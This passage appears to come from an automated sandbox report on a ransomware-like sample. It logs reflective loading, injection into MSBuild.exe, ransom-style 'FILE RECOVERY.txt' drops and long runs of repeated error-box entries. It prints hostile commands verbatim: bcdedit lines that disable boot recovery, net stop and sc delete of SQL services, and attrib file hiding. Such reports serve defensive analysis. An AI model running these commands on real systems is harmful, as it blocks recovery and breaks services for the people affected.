        Source: 4.2.R1TftmQpuQ.bat.exe.7fe0000.5.raw.unpack, ListDecorator.cs.Net Code: Read
        Source: 4.2.R1TftmQpuQ.bat.exe.7fe0000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
        Source: 4.2.R1TftmQpuQ.bat.exe.7fe0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
        Source: 4.2.R1TftmQpuQ.bat.exe.7fe0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
        Source: 4.2.R1TftmQpuQ.bat.exe.7fe0000.5.raw.unpack, Elwj.cs.Net Code: Wuuoeos System.AppDomain.Load(byte[])
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004069AB GetUserDefaultLangID,LoadLibraryA,GetProcAddress,GetProcAddress,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,CreateThread,CloseHandle,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleFileNameW,lstrlenW,lstrcpyW,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetModuleHandleW,RegisterClassW,CreateWindowExW,DeleteCriticalSection,DeleteCriticalSection,DeleteCriticalSection,DeleteCriticalSection,10_2_004069AB
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeCode function: 4_2_048B42D9 push ebx; ret 4_2_048B42DA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041B940 push eax; retn 0041h10_2_0041B955
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00409636 push ecx; ret 10_2_00409649
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00417783 push ecx; ret 10_2_00417796

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
        Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\7-Zip\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessibility\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Java\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Maintenance\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\StartUp\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\System Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\Windows PowerShell\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\Programs\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\All Users\Start Menu\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessories\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Documents and Settings\Default\Start Menu\FILE RECOVERY.txtJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLSERVERAGENT"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00404C3D GetModuleFileNameW,wnsprintfW,wnsprintfW,CopyFileW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,10_2_00404C3D
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1000\FILE RECOVERY.txtJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
